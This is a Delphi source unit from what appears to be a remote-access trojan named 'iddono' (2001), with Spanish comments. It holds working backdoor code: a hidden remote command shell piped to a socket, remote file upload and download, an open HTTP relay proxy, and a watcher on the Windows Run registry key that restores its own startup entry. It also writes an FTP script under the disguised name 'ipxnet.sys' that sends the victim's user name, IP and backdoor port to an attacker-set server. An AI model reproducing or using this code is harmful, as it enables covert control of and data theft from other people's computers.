unit ThreadsProcs;

//////////////////////////////////////////////
//           Unit para iddono v1.5          //
//          (THREADS - PROCS 2001)          //
//////////////////////////////////////////////

{Todas las siguientes funciones son threads...}

interface

procedure CreateTRegistryChange;
procedure CreateTRegistryChangeEx;
procedure CreateTPipeConsole(sr : string);
procedure TerminatePipeConsole();
procedure CreateProxy(PPort : Word);
procedure EndProxy();
procedure CreateTFileNet(sr : string; TrnfTy : Byte);

implementation

uses DLL_Call, Windows, WinSock;

var
  TrnfType : Byte;
  psr, ConsoleApp : string;
  TID_PRXY : Cardinal;
  RunPrxy : Boolean;
  RunPipe : Boolean;

//Toma parametros segun su posicion en la cadena
function GetInstrByNum(buf, DivStr : string; ni : integer) : string;
var
   i, ch : Integer;
begin
   Result:='';
   i:=1; ch:=1;
   while (ch <= Length(buf)) do begin
     if (Copy(buf, ch, Length(DivStr)) <> DivStr) then begin
        if (i = ni) then Result:= Result + Copy(buf,ch,1);
     end else begin
        Inc(i);
        ch := ch + Length(DivStr) - 1;
     end;
     if (i > ni) then Break;
     inc(ch);
   end;
   Result:=Trim(Result);
end;

function GetHost(resp : PChar) : string;
var
  i : integer;
  getstr : string;
begin
  i:=0;
  getstr := 'x';
  while getstr <> '' do begin
  inc(i);
  getstr := GetInstrByNum(string(resp), #13#10, i);
  if Copy(getstr,1,5) = 'Host:' then begin
     Result := Copy(getstr,6,Length(getstr));
     break;
  end;
  end;
end;

//-----------------Proxy iddono - v1.0-----------------
//-----------------------------------------------------
//----------------------MiniProxy----------------------
procedure DataProxy(newsock : TSocket);
var
  HostEt : PHostEnt;
  addrCli : TSockAddrIn;
  sockerc : TSocket;
  BytesRead, BytesRecv, sinsixe, retval : Integer;
  Buffile, Buffhttp : array[1..2048] of Char;
  HostName : string;
  VarIp : PChar;
  TypeBlock : Longint;
begin
  TypeBlock := 0;
  IOctlSocket(newsock, FIONBIO, TypeBlock);  //Blocked

  addrCli.sin_family := AF_INET;
  addrCli.sin_port := htons(80);

  BytesRead := Recv(newsock, Buffile, SizeOf(Buffile), 0);

  HostName := trim(GetHost(@Buffile));

  //Toma la direccion IP de un nombre de host
  hostet := GetHostByName(PChar(HostName));
  if hostet <> nil then begin
    VarIp:=iNet_ntoa(PInAddr(hostet^.h_addr_list^)^);
  end else begin
    VarIp := PChar(HostName);
  end;

  //Realiza la conexion hacia el server HTTP
  addrCli.sin_addr.S_addr := inet_addr(VarIp);
  sockerc :=  socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  sinsixe := SizeOf(addrCli);
  retval := Connect(sockerc, addrCli, sinsixe);
  //Si logra una conexion
  If retval = 0 then begin
    //ioctlsocket(sockerc, FIONBIO, TypeBlock);
    //Envia los datos recividos por el navegador
    //hacia el server HTTP.
    Send(sockerc, Buffile, BytesRead, 0);
    //Comienza el paso de datos (funcion del proxy)
    repeat
      //Los datos recividos del server HTTP
      if RunPrxy = False then Break;
      BytesRecv := Recv(sockerc, Buffhttp, SizeOf(Buffhttp), 0);
      //son enviados hacia el navegador WEB
      retval := Send(newsock, Buffhttp, BytesRecv, 0);
    until (BytesRecv = -1) or (BytesRecv = 0) or (retval = SOCKET_ERROR);
    CloseSocket(sockerc);   //Cierra la conexion proxy->server http
  end;
  CloseSocket(newsock);   //Cierra la conexion cliente->proxy
end;

procedure ExecuteProxy(PrxyPort : Word);
var
  addr : TSockAddrIn;
  sinsize : Integer;
  sockerz, newsock : TSocket;
  TypeBlock : Longint;
begin
  addr.sin_family := AF_INET;
  addr.sin_port := htons(4480);
  addr.sin_addr.S_addr := INADDR_ANY;

  //Abre el socket

  sockerz :=  Socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  if Bind(sockerz, addr, SizeOf(addr)) = SOCKET_ERROR then Exit;
  if Listen(sockerz, 4) = SOCKET_ERROR then Exit;
  sinsize := SizeOf(addr);
  TypeBlock := 1;
  IOctlSocket(sockerz, FIONBIO, TypeBlock);  //NonBlocked

  PostMessage(WHandle, $955, 0, 0);   //Indica inicio del Proxy

  while RunPrxy do begin
    //Espera una conexion
    newsock := Accept(sockerz, @addr, @sinsize);
    if newsock <> INVALID_SOCKET then begin
      DataProxy(newsock);
      newsock := INVALID_SOCKET;
    end;
  end;
  CloseSocket(sockerz);

  PostMessage(WHandle, $965, 0, 0);   //Indica fin del Proxy
end;

//Inicia el proxy HTTP
procedure CreateProxy(PPort : Word);
var
  hthread : LongWord;
begin
  RunPrxy := True;
  hthread := CreateThread(nil, 0, @ExecuteProxy, @PPort, 0, TID_PRXY);
  if hthread <> 0 then CloseHandle(hthread);
end;

//Termina el proxy HTTP
procedure EndProxy();
begin
  if RunPrxy then begin
    RunPrxy := False;
  end;
end;

//Download - Upload de archivos remotos (Thread)
procedure ExecuteTFileNet;
var
  addr : TSockAddrIn;
  retval, sinsize, Port : Integer;
  sockerz, newsock : TSocket;
  Handle: THandle;
  FindData: TWin32FindData;
  //Copia de archivo
  FileName : string;
  SrcFile : THandle;
  Buffile: array [1..1024] of Char;
  BytesRead, BytesWirte : DWORD;
  FileStatus : Boolean;
begin
  try Port := StrToIntDef(GetParamByNum(psr, ' ', 1), 0);
  except Exit;
  end;
  FileName := GetParamByNum(psr, ' ', 2);
  //Comprueba si el archivo existe
  if (TrnfType = 0) then
     Handle := FindFirstFile(PChar(FileName), FindData)
  else
     Handle := 1;
  if (Handle <> INVALID_HANDLE_VALUE) then begin
    addr.sin_family := AF_INET;
    addr.sin_port := htons(Port);
    addr.sin_addr.S_addr := INADDR_ANY;
    //Abre el socket
    sockerz :=  Socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    if Bind(sockerz, addr, SizeOf(addr)) = SOCKET_ERROR then Exit;
    if Listen(sockerz, 1) = SOCKET_ERROR then Exit;
    PostMessage(WHandle, $975, 0, 0);   //Indica inicio de copia
    //Espera una conexion
    sinsize := SizeOf(addr);
    newsock := Accept(sockerz, @addr, @sinsize);
    BytesWirte := 0;
    If (TrnfType = 0) then begin   {Funcion Get - Cliente Download}
        try
          SrcFile := CreateFile (PChar(FileName), GENERIC_READ,
          0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
          SetFilePointer(SrcFile, 0, nil, FILE_BEGIN);
        except
          CloseSocket(sockerz);
          Exit;
        end;
        Sleep(150);
        repeat
          FileStatus := ReadFile (SrcFile, Buffile, SizeOf(Buffile), BytesRead, nil);
          retval := Send(newsock, Buffile, BytesRead, 0);
        until (FileStatus = True) and (BytesRead = 0);
      end else begin   {Funcion Put - Cliente Upload}
        try
          SrcFile := CreateFile (PChar(FileName), GENERIC_WRITE,
          0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
        except
          CloseSocket(sockerz);
          Exit;
        end;
        repeat
          BytesRead := Recv(newsock, Buffile, SizeOf(Buffile), 0);
          FileStatus := WriteFile(SrcFile, Buffile, BytesRead, BytesWirte, nil);
          // FileStatus es falso si ocurre un error al escrivir el archivo
        until (FileStatus = False) or (BytesRead = 0);
      end;
      CloseHandle(SrcFile);
      DataRet := IntToStr(retval);
      try CloseSocket(newsock);
      except end;
      CloseSocket(sockerz);
      PostMessage(WHandle, $985, 0, 0);   //Indica fin de copia
  end else begin
      DataRet := 'FileNotExist';
  end;
end;

//Inica el Thread ExecuteTFileNet - Copia de un sentido u otro
//archivos remotos.
procedure CreateTFileNet(sr : string; TrnfTy : Byte);
var
  THREADID : cardinal;
  hthread : LongWord;
begin
  psr := sr;
  TrnfType := TrnfTy;
  hthread := CreateThread(nil, 0, @ExecuteTFileNet, nil, 0, THREADID);
  if hthread <> 0 then CloseHandle(hthread);
end;

//Toma la salida de una plicacion de consola (Thread)
procedure ExecuteTPipeConsole;
const
  BufSize = $FFFF;
var
  WriteHandle, ReadHandle : THandle;
  ReadBuf : array[0..BufSize] of Char;
  BytesRead, BytesWrite, ExitCode : DWORD;
  StartupInfo : TStartupInfo;
  ProcessInfo : TProcessInformation;
  TimeOut : Integer;
  BytesAvail,BytesLeft : Cardinal;
  ConsoleExecute : string;
begin
  ConsoleExecute := 'command.com /C ' + ConsoleApp;
  FillChar(StartupInfo,SizeOf(StartupInfo), 0);
  FillChar(ReadBuf, SizeOf(ReadBuf), 0);
  CreatePipe(ReadHandle, WriteHandle, nil, BufSize);

  with StartupInfo do
  begin
    cb          := SizeOf(StartupInfo);
    dwFlags     := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
    hStdOutput  := WriteHandle;
    hStdError   := WriteHandle;
    wShowWindow := SW_HIDE;
  end;

  if CreateProcess(nil, PChar(ConsoleExecute), nil, nil, false,
     DETACHED_PROCESS or REALTIME_PRIORITY_CLASS, nil, nil,
     StartupInfo, ProcessInfo) then
  begin
    RunPipe := True;
    repeat
      GetExitCodeProcess(ProcessInfo.hProcess, ExitCode);
      if (exitcode <> STILL_ACTIVE) then Break;
      if (TimeOut > $FFFFF) or (RunPipe = False) then begin
         TerminateProcess(ProcessInfo.hProcess, WAIT_TIMEOUT);
         Break;
      end;
      FillChar(ReadBuf,SizeOf(ReadBuf),0);
      PeekNamedPipe(ReadHandle,nil,0,nil,@BytesAvail,@BytesLeft);
      if (BytesAvail > 0) then begin
         ReadFile( ReadHandle, ReadBuf, BufSize, BytesRead, nil );
         OemToCharBuff(ReadBuf, ReadBuf, BufSize);
         WriteFile(GralSocket, ReadBuf, BytesRead, BytesWrite, nil);
         TimeOut := 1;
      end else begin
         inc(TimeOut);
      end;
    until (exitcode <> STILL_ACTIVE);
    CloseHandle( ProcessInfo.hProcess );
    CloseHandle( ProcessInfo.hThread );
  end;
  CloseHandle( WriteHandle );
  WriteFile(GralSocket, '//EnD', 5, BytesWrite, nil);
  RunPipe := False;
end;

//Inica el Thread TPIPECONSOLE - Abre una aplicacion de consola
//y escrive la salida sobre un socket.
procedure CreateTPipeConsole(sr : string);
var
  THREADID : cardinal;
  hthread : LongWord;
begin
  ConsoleApp := sr;
  hthread := CreateThread(nil, 0, @ExecuteTPipeConsole, nil, 0, THREADID);
  if hthread <> 0 then CloseHandle(hthread);
end;

//Termina el Thread TPIPECONSOLE
procedure TerminatePipeConsole();
begin
  if RunPipe then begin
    RunPipe := False;
  end;
end;

//Controla cambios en el registro (Sobre la clave especificada)
procedure ExecuteTRegistryChange;
var
  ValueNotify : THandle;
  KeyHandle : HKEY;
begin
   while True do begin
      RegOpenKeyEx (HKEY_LOCAL_MACHINE, PChar('Software\Microsoft\Windows\CurrentVersion\Run'), 0, KEY_ALL_ACCESS, KeyHandle);
      ValueNotify := CreateEvent(nil, False, False, 'ValueChange');
      RegNotifyChangeKeyValue(KeyHandle, False, REG_NOTIFY_CHANGE_LAST_SET, ValueNotify, True);
      if WaitForSingleObject(ValueNotify, $FFFFFFFF) = WAIT_OBJECT_0 then begin
         ModRegistro(PathStr + ' /R /P');
      end;
  end;
end;

//Crea el archivo de envio de aviso FTP
procedure FTPCreateSrc();
var
   Buffile : string;
begin
   Buffile := 'open ' + ServerConf.serv_ftp + #32 + IntToStr(ServerConf.serv_ftp_prt) +
   #13#10 + 'user ' + ServerConf.serv_ftp_user + #13#10 + ServerConf.serv_ftp_pws +
   #13#10 + 'binary' + #13#10 + 'cd Upload' + #13#10 +
   'appen ' + GetWinDir + '\thread.id iddono.txt' + #13#10 + 'quit' + #13#10;
   CreateSrc(PChar(GetWinDir + '\ipxnet.sys'), PChar(Buffile));   //Crea el archivo de envio de aviso FTP
end;

//Envio de aviso FTP
procedure FTPSendSrc();
var
   msgPass : string;
begin
   msgPass := StrUserName + ' : ' + ValueTime + ' (Port=' + LongToStrEx(ServerConf.serv_prt) + ')' + #13#10 + GetIPHostName(nil);
   CreateSrc(PChar(GetWinDir + '\thread.id'), PChar(msgPass));   //Envio de aviso FTP
   WinExec (PChar('ftp -i -v -s:' + GetWinDir + '\ipxnet.sys -n '), 0);
end;

//Controla cambios en el registro (Sobre la clave especificada)
procedure ExecuteTRegistryChangeEx;
var
  ValueNotify : THandle;
  KeyHandle : HKEY;
begin
   while True do begin
      RegOpenKeyEx (HKEY_LOCAL_MACHINE, PChar('System\CurrentControlSet\Services\RemoteAccess'), 0, KEY_ALL_ACCESS, KeyHandle);
      ValueNotify := CreateEvent(nil, False, False, 'ValueChange');
      RegNotifyChangeKeyValue(KeyHandle, False, REG_NOTIFY_CHANGE_LAST_SET, ValueNotify, True);
      if WaitForSingleObject(ValueNotify, $FFFFFFFF) = WAIT_OBJECT_0 then begin
        if GetValue('Remote Connection', 1, KeyHandle) = '01000000' then begin
          if ServerConf.serv_ftp <> '' then begin
            FTPCreateSrc();   //Envio de aviso FTP
            FTPSendSrc();   //Crea el archivo de envio de aviso FTP
          end else if ServerConf.serv_irc <> '' then //IRC-CALL; 
        end;
      end;
  end;
end;

//Inica el Thread TRegistryChange - Controla comabios que se
//provoquen sobre la clave especificada.
procedure CreateTRegistryChange;
var
  THREADID : Cardinal;
  hthread : LongWord;
begin
  hthread := CreateThread(nil, 0, @ExecuteTRegistryChange, nil, 0, THREADID);
  if hthread <> 0 then CloseHandle(hthread);
end;

//Inica el Thread TRegistryChangeEx - Controla comabios que se
//provoquen sobre la clave especificada.
procedure CreateTRegistryChangeEx;
var
  THREADID : Cardinal;
  hthread : LongWord;
begin
  hthread := CreateThread(nil, 0, @ExecuteTRegistryChangeEx, nil, 0, THREADID);
  if hthread <> 0 then CloseHandle(hthread);
end;

end.
